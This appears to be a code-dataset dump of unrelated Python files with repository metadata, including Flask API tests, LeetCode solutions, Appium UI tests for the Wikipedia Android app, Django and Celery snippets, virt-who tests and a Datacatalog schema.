'id': 'test.foo',
'leaf': 1,
'text': 'foo',
}])
response = self.app.get(url, query_string={'query': 'test.*',
'format': 'treejson',
'wildcards': 1})
self.assertJSON(response, [{
'text': '*',
'expandable': 1,
'leaf': 0,
'id': 'test.*',
'allowChildren': 1,
}, {
'allowChildren': 1,
'expandable': 1,
'id': 'test.bar',
'leaf': 0,
'text': 'bar',
}, {
'allowChildren': 0,
'expandable': 0,
'id': 'test.foo',
'leaf': 1,
'text': 'foo',
}])
response = self.app.get(url, query_string={'query': 'test.*',
'format': 'completer'})
self.assertJSON(response, {'metrics': [{
'is_leaf': 0,
'name': 'bar',
'path': 'test.bar.',
}, {
'is_leaf': 1,
'name': 'foo',
'path': 'test.foo',
}]})
response = self.app.get(url, query_string={'query': 'test.*',
'wildcards': 1,
'format': 'completer'})
self.assertJSON(response, {'metrics': [{
'is_leaf': 0,
'name': 'bar',
'path': 'test.bar.',
}, {
'is_leaf': 1,
'name': 'foo',
'path': 'test.foo',
}, {
'name': '*',
}]})
def test_find_validation(self):
url = '/metrics/find'
response = self.app.get(url, query_string={'query': 'foo',
'wildcards': 'aaa'})
self.assertJSON(response, {'errors': {'wildcards': 'must be 0 or 1.'}},
status_code=400)
response = self.app.get(url, query_string={'query': 'foo',
'from': 'aaa',
'until': 'bbb'})
self.assertJSON(response, {'errors': {
'from': 'must be an epoch timestamp.',
'until': 'must be an epoch timestamp.',
}}, status_code=400)
response = self.app.get(url, query_string={'query': 'foo',
'format': 'other'})
self.assertJSON(response, {'errors': {
'format': 'unrecognized format: "other".',
}}, status_code=400)
def test_expand(self):
url = '/metrics/expand'
response = self.app.get(url)
self.assertJSON(response, {'errors':
{'query': 'this parameter is required.'}},
status_code=400)
response = self.app.get(url, query_string={'query': 'test'})
self.assertJSON(response, {'results': []})
self._create_dbs()
response = self.app.get(url, query_string={'query': 'test'})
self.assertJSON(response, {'results': ['test']})
response = self.app.get(url, query_string={'query': 'test.*'})
self.assertJSON(response, {'results': ['test.bar', 'test.foo']})
response = self.app.get(url, query_string={'query': 'test.*',
'leavesOnly': 1})
self.assertJSON(response, {'results': ['test.foo']})
response = self.app.get(url, query_string={'query': 'test.*',
'groupByExpr': 1})
self.assertJSON(response, {'results': {'test.*': ['test.bar',
'test.foo']}})
def test_expand_validation(self):
url = '/metrics/expand'
response = self.app.get(url, query_string={'query': 'foo',
'leavesOnly': 'bbb',
'groupByExpr': 'aaa'})
self.assertJSON(response, {'errors': {
'groupByExpr': 'must be 0 or 1.',
'leavesOnly': 'must be 0 or 1.',
}}, status_code=400)
def test_noop(self):
url = '/dashboard/find'
response = self.app.get(url)
self.assertJSON(response, {'dashboards': []})
url = '/dashboard/load/foo'
response = self.app.get(url)
self.assertJSON(response, {'error': "Dashboard 'foo' does not exist."},
status_code=404)
url = '/events/get_data'
response = self.app.get(url)
self.assertJSON(response, [])
def test_search(self):
url = '/metrics/search'
response = self.app.get(url, query_string={'max_results': 'a'})
self.assertJSON(response, {'errors': {
'max_results': 'must be an integer.',
'query': 'this parameter is required.'}}, status_code=400)
response = self.app.get(url, query_string={'query': 'test'})
self.assertJSON(response, {'metrics': []})
def test_search_index(self):
response = self.app.get('/metrics/search',
query_string={'query': 'collectd.*'})
self.assertJSON(response, {'metrics': []})
parent = os.path.join(WHISPER_DIR, 'collectd')
os.makedirs(parent)
for metric in ['load', 'memory', 'cpu']:
db = os.path.join(parent, '{0}.wsp'.format(metric))
whisper.create(db, [(1, 60)])
response = self.app.put('/index')
self.assertJSON(response, {'success': True, 'entries': 3})
response = self.app.get('/metrics/search',
query_string={'query': 'collectd.*'})
self.assertJSON(response, {'metrics': [
{'is_leaf': False, 'path': None},
{'is_leaf': True, 'path': 'collectd.cpu'},
{'is_leaf': True, 'path': 'collectd.load'},
{'is_leaf': True, 'path': 'collectd.memory'},
]})
|
[
"[email protected]"
] | |
8afec5a7c9748873c1dbc65e7e67f6d025f33a9e
|
51d098e7ac392556a6365fcf7d283546d1bc86cb
|
/pysswords/db/credential.py
|
651901a52f61b2811503c8e9363f048ac638b221
|
[
"MIT"
] |
permissive
|
mauriciomelo/pysswords
|
7dd632577b261aa198a618ca1d6d0faa825cb5e7
|
e845475a2a37f6e5ac4fadbc821d89dad6971f1c
|
refs/heads/master
| 2021-01-13T11:41:44.568197 | 2014-12-04T19:32:57 | 2014-12-04T19:32:57 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 144 |
py
|
from collections import namedtuple
Credential = namedtuple(
"Credential",
["name", "login", "password", "login_url", "description"]
)
|
[
"[email protected]"
] | |
53e93f962e07335199743cfd2031f7866c6928b6
|
f891828ffe9c8501d276560c8c52d319f284056f
|
/205_isomorphic_m/index_map.py
|
0f5f7ccd9a02480277885e72dd81ce413e922721
|
[] |
no_license
|
chao-shi/lclc
|
1b852ab61fef4072039c61f68e951ab2072708bf
|
2722c0deafcd094ce64140a9a837b4027d29ed6f
|
refs/heads/master
| 2021-06-14T22:07:54.120375 | 2019-09-02T23:13:59 | 2019-09-02T23:13:59 | 110,387,039 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 214 |
py
|
class Solution(object):
def isIsomorphic(self, s, t):
"""
:type s: str
:type t: str
:rtype: bool
"""
return map(s.find, s) == map(t.find, t)
# From OJ discussion
|
[
"[email protected]"
] | |
a44f223635db7b358b49ccb6ca7923250c316bad
|
be5ea20226c37d81f1ccb2f704d8825d36e88765
|
/Exams/2-apr-2020/skeleton/tests/test_magic_card.py
|
75d8d74d391b2baf58d8a14b44e8e5b922aabf4f
|
[] |
no_license
|
dimDamyanov/PythonOOP
|
3845e450e5a48fef4f70a186664e07c0cd60e09b
|
723204f5b7e953874fac9314e48eb1d1628d6ff5
|
refs/heads/main
| 2023-04-07T18:00:36.735248 | 2021-04-19T20:57:14 | 2021-04-19T20:57:14 | 341,329,346 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,231 |
py
|
import unittest
from project.card.magic_card import MagicCard
class TestMagicCard(unittest.TestCase):
def setUp(self) -> None:
self.magic_card = MagicCard('Card')
def test_init_attrs_set(self) -> None:
self.assertEqual(self.magic_card.name, 'Card')
self.assertEqual(self.magic_card.damage_points, 5)
self.assertEqual(self.magic_card.health_points, 80)
def test_init__when_name_invalid__expect_exception(self) -> None:
with self.assertRaises(ValueError) as context:
MagicCard('')
self.assertEqual(context.exception.args[0], 'Card\'s name cannot be an empty string.')
def test_damage_points_setter__expect_exception(self) -> None:
with self.assertRaises(ValueError) as context:
self.magic_card.damage_points = -10
self.assertEqual(context.exception.args[0], 'Card\'s damage points cannot be less than zero.')
def test_health_points_setter__expect_exception(self) -> None:
with self.assertRaises(ValueError) as context:
self.magic_card.health_points = -10
self.assertEqual(context.exception.args[0], 'Card\'s HP cannot be less than zero.')
if __name__ == '__main__':
unittest.main()
|
[
"[email protected]"
] | |
426d534ea1ee13cc690136f8ee33d913fa161456
|
fd90b8efa1daaec44b54797e549e0f738f4a5897
|
/shuxue/3的幂.py
|
648fe8a17fac9249b54026f7347281ef036e3e5e
|
[] |
no_license
|
ddz-mark/LeetCode
|
2a622eeb655398ca9ebd9feee93a52cd114a77c4
|
d557faf87374ad8c65634ee9d9e572b88a54913a
|
refs/heads/master
| 2021-07-12T06:58:57.162657 | 2021-04-18T13:25:03 | 2021-04-18T13:25:03 | 244,403,881 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 456 |
py
|
# 给定一个整数,写一个函数来判断它是否是 3 的幂次方。
class Solution(object):
def isPowerOfThree(self, n):
"""
:type n: int
:rtype: bool
"""
if n == 0 :
return False
while n % 3 == 0:
n /= 3
if n == 1:
return True
else:
return False
if __name__ == '__main__':
ob = Solution()
print(ob.isPowerOfThree(9))
|
[
"[email protected]"
] | |
37ad995aa7d1d0d0fc4db7476eed8c5d9fcb4d47
|
32eeb97dff5b1bf18cf5be2926b70bb322e5c1bd
|
/benchmark/wikipedia/testcase/interestallcases/testcase1_008_0.py
|
34135d8ab0a3e138c9938ad9ce244b9bbea57ae9
|
[] |
no_license
|
Prefest2018/Prefest
|
c374d0441d714fb90fca40226fe2875b41cf37fc
|
ac236987512889e822ea6686c5d2e5b66b295648
|
refs/heads/master
| 2021-12-09T19:36:24.554864 | 2021-12-06T12:46:14 | 2021-12-06T12:46:14 | 173,225,161 | 5 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,965 |
py
|
#coding=utf-8
import os
import subprocess
import time
import traceback
from appium import webdriver
from appium.webdriver.common.touch_action import TouchAction
from selenium.common.exceptions import NoSuchElementException, WebDriverException
desired_caps = {
'platformName' : 'Android',
'deviceName' : 'Android Emulator',
'platformVersion' : '4.4',
'appPackage' : 'org.wikipedia',
'appActivity' : 'org.wikipedia.main.MainActivity',
'resetKeyboard' : True,
'androidCoverage' : 'org.wikipedia/org.wikipedia.JacocoInstrumentation',
'noReset' : True
}
def command(cmd, timeout=5):
p = subprocess.Popen(cmd, stderr=subprocess.STDOUT, stdout=subprocess.PIPE, shell=True)
time.sleep(timeout)
p.terminate()
return
def getElememt(driver, str) :
for i in range(0, 5, 1):
try:
element = driver.find_element_by_android_uiautomator(str)
except NoSuchElementException:
time.sleep(1)
else:
return element
os.popen("adb shell input tap 50 50")
element = driver.find_element_by_android_uiautomator(str)
return element
def getElememtBack(driver, str1, str2) :
for i in range(0, 2, 1):
try:
element = driver.find_element_by_android_uiautomator(str1)
except NoSuchElementException:
time.sleep(1)
else:
return element
for i in range(0, 5, 1):
try:
element = driver.find_element_by_android_uiautomator(str2)
except NoSuchElementException:
time.sleep(1)
else:
return element
os.popen("adb shell input tap 50 50")
element = driver.find_element_by_android_uiautomator(str2)
return element
def swipe(driver, startxper, startyper, endxper, endyper) :
size = driver.get_window_size()
width = size["width"]
height = size["height"]
try:
driver.swipe(start_x=int(width * startxper), start_y=int(height * startyper), end_x=int(width * endxper),
end_y=int(height * endyper), duration=2000)
except WebDriverException:
time.sleep(1)
driver.swipe(start_x=int(width * startxper), start_y=int(height * startyper), end_x=int(width * endxper),
end_y=int(height * endyper), duration=2000)
return
def scrollToFindElement(driver, str) :
for i in range(0, 5, 1):
try:
element = driver.find_element_by_android_uiautomator(str)
except NoSuchElementException:
swipe(driver, 0.5, 0.6, 0.5, 0.2)
else:
return element
return
def clickoncheckable(driver, str, value = "true") :
parents = driver.find_elements_by_class_name("android.widget.LinearLayout")
for parent in parents:
try :
parent.find_element_by_android_uiautomator(str)
lists = parent.find_elements_by_class_name("android.widget.LinearLayout")
if (len(lists) == 1) :
innere = parent.find_element_by_android_uiautomator("new UiSelector().checkable(true)")
nowvalue = innere.get_attribute("checked")
if (nowvalue != value) :
innere.click()
break
except NoSuchElementException:
continue
# preference setting and exit
try :
os.popen("adb shell svc data diable")
time.sleep(5)
starttime = time.time()
driver = webdriver.Remote('http://localhost:4723/wd/hub', desired_caps)
os.popen("adb shell am start -n org.wikipedia/org.wikipedia.settings.DeveloperSettingsActivity")
scrollToFindElement(driver, "new UiSelector().text(\"useRestbase_setManually\")").click()
clickoncheckable(driver, "new UiSelector().text(\"useRestbase_setManually\")", "true")
scrollToFindElement(driver, "new UiSelector().text(\"suppressNotificationPolling\")").click()
clickoncheckable(driver, "new UiSelector().text(\"suppressNotificationPolling\")", "false")
scrollToFindElement(driver, "new UiSelector().text(\"memoryLeakTest\")").click()
clickoncheckable(driver, "new UiSelector().text(\"memoryLeakTest\")", "true")
scrollToFindElement(driver, "new UiSelector().text(\"readingListLoginReminder\")").click()
clickoncheckable(driver, "new UiSelector().text(\"readingListLoginReminder\")", "false")
scrollToFindElement(driver, "new UiSelector().text(\"readingListsFirstTimeSync\")").click()
clickoncheckable(driver, "new UiSelector().text(\"readingListsFirstTimeSync\")", "true")
driver.press_keycode(4)
time.sleep(2)
os.popen("adb shell am start -n org.wikipedia/org.wikipedia.settings.SettingsActivity")
scrollToFindElement(driver, "new UiSelector().text(\"Show link previews\")").click()
clickoncheckable(driver, "new UiSelector().text(\"Show link previews\")", "false")
scrollToFindElement(driver, "new UiSelector().text(\"Download only over Wi-Fi\")").click()
clickoncheckable(driver, "new UiSelector().text(\"Download only over Wi-Fi\")", "false")
scrollToFindElement(driver, "new UiSelector().text(\"Show images\")").click()
clickoncheckable(driver, "new UiSelector().text(\"Show images\")", "false")
driver.press_keycode(4)
time.sleep(2)
except Exception, e:
print 'FAIL'
print 'str(e):\t\t', str(e)
print 'repr(e):\t', repr(e)
print traceback.format_exc()
finally :
endtime = time.time()
print 'consumed time:', str(endtime - starttime), 's'
command("adb shell am broadcast -a com.example.pkg.END_EMMA --es name \"1_008_pre\"")
jacocotime = time.time()
print 'jacoco time:', str(jacocotime - endtime), 's'
driver.quit()
# testcase008
try :
starttime = time.time()
driver = webdriver.Remote('http://localhost:4723/wd/hub', desired_caps)
element = getElememt(driver, "new UiSelector().resourceId(\"org.wikipedia:id/menu_overflow_button\").className(\"android.widget.TextView\")")
TouchAction(driver).long_press(element).release().perform()
swipe(driver, 0.5, 0.8, 0.5, 0.2)
element = getElememt(driver, "new UiSelector().resourceId(\"org.wikipedia:id/menu_overflow_button\").className(\"android.widget.TextView\")")
TouchAction(driver).long_press(element).release().perform()
element = getElememt(driver, "new UiSelector().resourceId(\"org.wikipedia:id/icon\").className(\"android.widget.ImageView\")")
TouchAction(driver).tap(element).perform()
element = getElememtBack(driver, "new UiSelector().text(\"Got it\")", "new UiSelector().className(\"android.widget.TextView\").instance(2)")
TouchAction(driver).tap(element).perform()
element = getElememt(driver, "new UiSelector().resourceId(\"org.wikipedia:id/view_static_card_icon\").className(\"android.widget.ImageView\")")
TouchAction(driver).tap(element).perform()
element = getElememt(driver, "new UiSelector().className(\"android.widget.ImageView\").description(\"Share the article link\")")
TouchAction(driver).tap(element).perform()
except Exception, e:
print 'FAIL'
print 'str(e):\t\t', str(e)
print 'repr(e):\t', repr(e)
print traceback.format_exc()
else:
print 'OK'
finally:
cpackage = driver.current_package
endtime = time.time()
print 'consumed time:', str(endtime - starttime), 's'
command("adb shell am broadcast -a com.example.pkg.END_EMMA --es name \"1_008\"")
jacocotime = time.time()
print 'jacoco time:', str(jacocotime - endtime), 's'
driver.quit()
if (cpackage != 'org.wikipedia'):
cpackage = "adb shell am force-stop " + cpackage
os.popen(cpackage)
os.popen("adb shell svc data enable")
|
[
"[email protected]"
] | |
ee0c0439bc8653fcafc1eda4272bc03c2c60a56f
|
fafee9d79beb7433633d59dce865efb437d608f6
|
/__init__.py
|
89ba90efec4b90e8c130bf0cd0c31e76b9df484d
|
[
"MIT",
"BSD-3-Clause"
] |
permissive
|
PabloRomanH/cihaidata-unihan
|
65830d945e50518895ce3f06a211a117cd502b84
|
c408b57f61b5b13926f42c3647cc0bc61da758be
|
refs/heads/master
| 2021-01-12T22:33:15.289066 | 2016-06-03T17:37:40 | 2016-06-03T17:37:40 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 674 |
py
|
#!/usr/bin/env python
# -*- coding: utf8 - *-
"""Tool to build `Unihan`_ dataset into datapackage / simple data format."""
from __future__ import absolute_import, division, print_function, \
with_statement, unicode_literals
__title__ = 'cihaidata-python'
__package_name__ = 'cihaidata_python'
__description__ = 'Tool to build `Unihan`_ dataset into datapackage / simple data format.'
__version__ = '0.0.1'
__author__ = 'Tony Narlock'
__email__ = '[email protected]'
__license__ = 'MIT'
__copyright__ = 'Copyright 2013-2014 Tony Narlock'
from .unihan import Unihan, check_install, create_table, flatten_datasets
from .scripts import save, download, extract, convert
|
[
"[email protected]"
] | |
dba9cbb205056e92cf377392703f257eafae100a
|
242f1dafae18d3c597b51067e2a8622c600d6df2
|
/src/1400-1499/1486.xor.in.array.py
|
9f93fdedc92c4d84e1a7f4947d3adae6aec16ebd
|
[] |
no_license
|
gyang274/leetcode
|
a873adaa083270eb05ddcdd3db225025533e0dfe
|
6043134736452a6f4704b62857d0aed2e9571164
|
refs/heads/master
| 2021-08-07T15:15:01.885679 | 2020-12-22T20:57:19 | 2020-12-22T20:57:19 | 233,179,192 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 235 |
py
|
class Solution:
def xorOperation(self, n: int, start: int) -> int:
# TC: O(N), SC: O(1), note it is possible but difficult to complete this in O(1)..
ans = 0
for i in range(n):
ans ^= (start + 2 * i)
return ans
|
[
"[email protected]"
] | |
7cb4b4d3b8da5d4f881a238fd2bb87a15a3dbb29
|
d94b6845aeeb412aac6850b70e22628bc84d1d6d
|
/d3pm/text/main_test.py
|
ddcfcfad48bbd428ea167bea70a1e48d197f9795
|
[
"CC-BY-4.0",
"Apache-2.0"
] |
permissive
|
ishine/google-research
|
541aea114a68ced68736340e037fc0f8257d1ea2
|
c1ae273841592fce4c993bf35cdd0a6424e73da4
|
refs/heads/master
| 2023-06-08T23:02:25.502203 | 2023-05-31T01:00:56 | 2023-05-31T01:06:45 | 242,478,569 | 0 | 0 |
Apache-2.0
| 2020-06-23T01:55:11 | 2020-02-23T07:59:42 |
Jupyter Notebook
|
UTF-8
|
Python
| false | false | 1,725 |
py
|
# coding=utf-8
# Copyright 2023 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test for the main executable."""
import random
from absl.testing import absltest
import jax
import numpy as np
import tensorflow_datasets as tfds
from d3pm.text import configs
from d3pm.text import main
class MainTest(absltest.TestCase):
def test_small_training_job(self):
experiment_dir = self.create_tempdir().full_path
# Disable compiler optimizations for faster compile time.
jax.config.update('jax_disable_most_optimizations', True)
# Seed the random number generators.
random.seed(0)
np.random.seed(0)
# Construct a test config with a small number of steps.
configs.gin_load('lm1b_tiny')
with tfds.testing.mock_data(num_examples=2048):
# Make sure we can train without any exceptions.
main.run_experiment(
experiment_dir,
batch_size_per_device=1,
max_train_steps=1,
validate_every=5,
train_summary_frequency=5,
num_eval_steps=5,
num_predict_steps=1,
restore_checkpoint=False,
checkpoint_frequency=None,
)
if __name__ == '__main__':
absltest.main()
|
[
"[email protected]"
] | |
15af76b56f23169ecae06276f96acb2561d4c1b9
|
6480db97bf64fe5020bca084c38b7728ba9a1b9a
|
/pursuit/src/mvp_landing/urls.py
|
e10ed7a8489bdc075f57077b42c3bc7754100fd9
|
[] |
no_license
|
masterfung/mvp_landing-Django
|
056727d3c7107f18ea5203b98816bad9bb94edaa
|
4ae2d9128e13616ca2e4e82e36927a352f515858
|
refs/heads/master
| 2021-01-13T02:35:57.392427 | 2014-06-02T14:30:37 | 2014-06-02T14:30:37 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 731 |
py
|
from django.conf.urls import patterns, include, url
from django.conf import settings
from django.conf.urls.static import static
from django.contrib import admin
admin.autodiscover()
urlpatterns = patterns('',
# Examples: #has to be in order when it comes to views
url(r'^$', 'signups.views.home', name='home'),
# url(r'^blog/', include('blog.urls')),
url(r'^thank-you/$', 'signups.views.thankyou', name='thankyou'),
url(r'^about-us/$', 'signups.views.aboutus', name='aboutus'),
url(r'^admin/', include(admin.site.urls)),
)
if settings.DEBUG:
urlpatterns += static(settings.STATIC_URL, document_root = settings.STATIC_ROOT)
urlpatterns += static(settings.MEDIA_URL, document_root = settings.MEDIA_ROOT)
|
[
"[email protected]"
] | |
1575804de3dd437ba9e8b545b69edced761183fd
|
78d425c98f093e01dd78c15ffa76cf50f7e4fe1e
|
/tests/tier1/tc_1087_check_vdc_virtual_pool_revoked_in_guest_after_host_unattached.py
|
c2f7f74a50aa84f8b13159dec95faef8625f8fe0
|
[] |
no_license
|
Junefen/virtwho-ci
|
57ef8637a78605fd3f2b1d3eb31031ba2b0de480
|
23e144171d2cc6ee87edfefdace8a25eb3e7bc65
|
refs/heads/master
| 2023-03-19T04:16:08.055779 | 2021-09-29T03:52:08 | 2021-09-29T03:52:08 | 194,606,208 | 0 | 0 | null | 2019-07-01T05:35:22 | 2019-07-01T05:35:22 | null |
UTF-8
|
Python
| false | false | 2,453 |
py
|
# coding:utf-8
from virt_who import *
from virt_who.base import Base
from virt_who.register import Register
from virt_who.testing import Testing
class Testcase(Testing):
def test_run(self):
self.vw_case_info(os.path.basename(__file__), case_id='RHEL-134064')
self.vw_case_init()
# case config
results = dict()
virtwho_conf = "/etc/virt-who.conf"
self.vw_option_enable('[global]', virtwho_conf)
self.vw_option_enable('debug', virtwho_conf)
self.vw_option_update_value('debug', 'True', virtwho_conf)
config_name = "virtwho-config"
config_file = "/etc/virt-who.d/{0}.conf".format(config_name)
self.vw_etc_d_mode_create(config_name, config_file)
host_name = self.get_hypervisor_hostname()
host_uuid = self.get_hypervisor_hostuuid()
register_config = self.get_register_config()
vdc_physical_sku = register_config['vdc']
vdc_virtual_sku = register_config['vdc_bonus']
# case steps
logger.info(">>>step1: run virt-who and check the mapping info is sent or not")
data, tty_output, rhsm_output = self.vw_start()
res = self.op_normal_value(data, exp_error=0, exp_thread=1, exp_send=1)
results.setdefault('step1', []).append(res)
logger.info(">>>step2: attach physical sku for host/hypervisor")
sku_attrs = self.system_sku_attr(self.ssh_host(), vdc_physical_sku, "physical")
physical_pool_id = sku_attrs['pool_id']
self.vw_web_attach(host_name, host_uuid, physical_pool_id)
logger.info(">>>step3: attach virtual sku by pool_id in guest")
sku_attrs = self.system_sku_attr(self.ssh_guest(), vdc_virtual_sku, "virtual")
virtual_pool_id = sku_attrs['pool_id']
self.system_sku_attach(self.ssh_guest(), pool_id=virtual_pool_id)
output = self.system_sku_consumed(self.ssh_guest())
res = self.vw_msg_search(output, vdc_virtual_sku, exp_exist=True)
results.setdefault('step3', []).append(res)
logger.info(">>>step4: unattach physical sku from host/hypervisor and check virtual pool")
self.vw_web_unattach(host_name, host_uuid)
output = self.system_sku_consumed(self.ssh_guest(), exp_exist=False)
res = self.vw_msg_search(output, vdc_virtual_sku, exp_exist=False)
results.setdefault('step4', []).append(res)
# case result
self.vw_case_result(results)
|
[
"[email protected]"
] | |
ada54b21eb805ba13403e644e467913924e72667
|
d56828f1f7ae8fbb1fc2e79f84c82c4be1d13651
|
/google/cloud/datacatalog_v1/types/schema.py
|
4a51a1226512ae2416ba971f949dedc02bb6bb30
|
[
"Apache-2.0"
] |
permissive
|
isabella232/python-datacatalog
|
940d7664d55ae01524f7fe89f8a295e9190ec23c
|
d16420640ec97c17e4c63516b8375b41df82de9c
|
refs/heads/master
| 2022-12-19T23:03:49.561389 | 2020-10-16T19:58:42 | 2020-10-16T19:58:42 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,287 |
py
|
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
__protobuf__ = proto.module(
package="google.cloud.datacatalog.v1", manifest={"Schema", "ColumnSchema",},
)
class Schema(proto.Message):
r"""Represents a schema (e.g. BigQuery, GoogleSQL, Avro schema).
Attributes:
columns (Sequence[~.schema.ColumnSchema]):
Required. Schema of columns. A maximum of
10,000 columns and sub-columns can be specified.
"""
columns = proto.RepeatedField(proto.MESSAGE, number=2, message="ColumnSchema",)
class ColumnSchema(proto.Message):
r"""Representation of a column within a schema. Columns could be
nested inside other columns.
Attributes:
column (str):
Required. Name of the column.
type (str):
Required. Type of the column.
description (str):
Optional. Description of the column. Default
value is an empty string.
mode (str):
Optional. A column's mode indicates whether the values in
this column are required, nullable, etc. Only ``NULLABLE``,
``REQUIRED`` and ``REPEATED`` are supported. Default mode is
``NULLABLE``.
subcolumns (Sequence[~.schema.ColumnSchema]):
Optional. Schema of sub-columns. A column can
have zero or more sub-columns.
"""
column = proto.Field(proto.STRING, number=6)
type = proto.Field(proto.STRING, number=1)
description = proto.Field(proto.STRING, number=2)
mode = proto.Field(proto.STRING, number=3)
subcolumns = proto.RepeatedField(proto.MESSAGE, number=7, message="ColumnSchema",)
__all__ = tuple(sorted(__protobuf__.manifest))
|
[
"[email protected]"
] | |
72ff8c3550a9d80982b6ab69f568c80f8e65b8c8
|
df8c19c952f02e3527c0e06c1d74ed578ca0684b
|
/account/tasks.py
|
73d9501a1106ab6067bb90300b4c9dafed75e5bc
|
[] |
no_license
|
knkemree/msrugs_backend
|
ac8c703fb691c9a796028cb2c38abaf8ed98c98c
|
850026b2884e7618404ecfa030beccec93bb4596
|
refs/heads/master
| 2023-04-03T04:31:13.557762 | 2021-04-05T17:26:34 | 2021-04-05T17:26:34 | 354,910,411 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 494 |
py
|
from celery import shared_task
from django.core.mail import send_mail, mail_admins
from django.template import loader
from django.conf import settings
from celery.utils.log import get_task_logger
logger = get_task_logger(__name__)
@shared_task
def info_admins(email):
subject = "New Customer Registered"
message= "New customer"
mail_sent = mail_admins(subject, message, html_message="A new customer registered! Customer's email address is "+str(email))
return mail_sent
|
[
"[email protected]"
] | |
910afd2efa42ada5dd22923f2a6c53a466fb5a1f
|
c577d0d804ef826131a8a959ed10879d3fdfef2a
|
/profiles/migrations/0008_auto_20190206_2142.py
|
88de9108773cc666cfb035325fb04299faba7c2f
|
[] |
no_license
|
AlexFrundin/four
|
3d561e2f33e007e93b975b247752c06b392b1945
|
c937e0dc159f380abbcb5e646ebdf2a7a8fd6be0
|
refs/heads/master
| 2020-04-30T10:55:31.020357 | 2019-03-20T18:06:26 | 2019-03-20T18:06:26 | 176,788,979 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 395 |
py
|
# Generated by Django 2.1.3 on 2019-02-06 19:42
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('profiles', '0007_auto_20190206_1917'),
]
operations = [
migrations.AlterField(
model_name='profile',
name='birth',
field=models.DateField(blank=True, null=True),
),
]
|
[
"[email protected]"
] | |
c344e931dbc0bea19cfd8ade72f0e23e73c9944c
|
6bf7149077f539ab599db1f717c93aca82724512
|
/workshop/fig_games/project/game.py
|
28aac4f8ed638b7cc05a55b9da86ae835c56af25
|
[] |
no_license
|
KalinHar/OOP-Python-SoftUni
|
8b53e8b734b364878c5372525c4249fdd32f0899
|
9787eea7ab5101e887ed4aaeb0a8b3b80efcfdd7
|
refs/heads/master
| 2023-07-09T08:15:59.765422 | 2021-08-16T06:01:08 | 2021-08-16T06:01:19 | 380,813,294 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,577 |
py
|
from workshop.fig_games.project.suitcase import Suitcase
from workshop.fig_games.project.battle.area_battle import AreaBattle
from workshop.fig_games.project.battle.circumfernce_battle import CircumferenceBattle
from workshop.fig_games.project.battle.relative_battle import RelativeBattle
from workshop.fig_games.project.figure.triangle import Triangle
from workshop.fig_games.project.figure.circle import Circle
from workshop.fig_games.project.figure.square import Square
from workshop.fig_games.project.figure.rectangle import Rectangle
class Game:
def __init__(self):
self.figures = Suitcase()
def area_battle(self, fig1, fig2):
result = AreaBattle().battle(fig1, fig2)
if result:
return result.name
return None
def circumference_battle(self, fig1, fig2):
result = CircumferenceBattle().battle(fig1, fig2)
if result:
return result.name
return None
def relative_battle(self, fig1, fig2):
result = RelativeBattle().battle(fig1, fig2)
if result:
return result.name
return None
def total_battle(self):
while len(self.figures.repository) > 1:
fig1 = self.figures.repository.pop() # take first two figs
fig2 = self.figures.repository.pop() # take first two figs
result = [self.area_battle(fig1, fig2)]
result.append(self.circumference_battle(fig1, fig2))
result = [fig for fig in result if fig] # list with only wins results
result = set(result)
result = list(result)
if len(result) == 1: # check for winner
self.figures.add([f for f in [fig1, fig2] if f.name == result[0]][0]) # return the winner back
continue
result = self.relative_battle(fig1, fig2)
self.figures.add([f for f in (fig1, fig2) if f.name == result][0]) # return the winner back
return self.figures.repository[0]
def __str__(self):
return f"The winner is:\n{str(self.total_battle())}"
tri1 = Triangle("tri1", 9, 4, 6.5, 4.5)
tri2 = Triangle("tri2", 5, 2.4, 3, 4)
cir1 = Circle("cir1", 3)
rec1 = Rectangle("rec1", 1, 7)
squ1 = Square("squ1", 6)
g = Game()
print(g.figures.add(tri1))
print(g.figures.add(tri2))
print(g.figures.add(cir1))
print(g.figures.add(rec1))
print(g.figures.add(squ1))
print(g.area_battle(cir1, tri1))
print(g.circumference_battle(cir1, tri1))
print(g.relative_battle(cir1, tri1))
print(g.figures.remove("squ1"))
print(g.figures)
print("-------------")
print(g)
|
[
"[email protected]"
] | |
802695a099e500fec46d761a6bc06d2bd5ff349a
|
4ba4ae24e734686f28fe395390a2d0210eb88458
|
/programas/galeria/orbita de .5 sobre la logística/orbita_0.5_logistica.py
|
c2fdeeaff5bbbd9bcf411db25878759de40fc3e1
|
[] |
no_license
|
fhca/Sistemas-Complejos-1
|
a7578ae981c694ae2500a847adfe79c6c58c69ae
|
a2b70adf3859dd6a7318da98228adef78698f9c5
|
refs/heads/master
| 2021-01-15T19:59:49.778497 | 2017-12-16T03:34:51 | 2017-12-16T03:34:51 | 99,835,884 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 690 |
py
|
__author__ = 'fhca'
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import axes3d
from matplotlib import cm
def logistic(c, x):
return c * x * (1 - x)
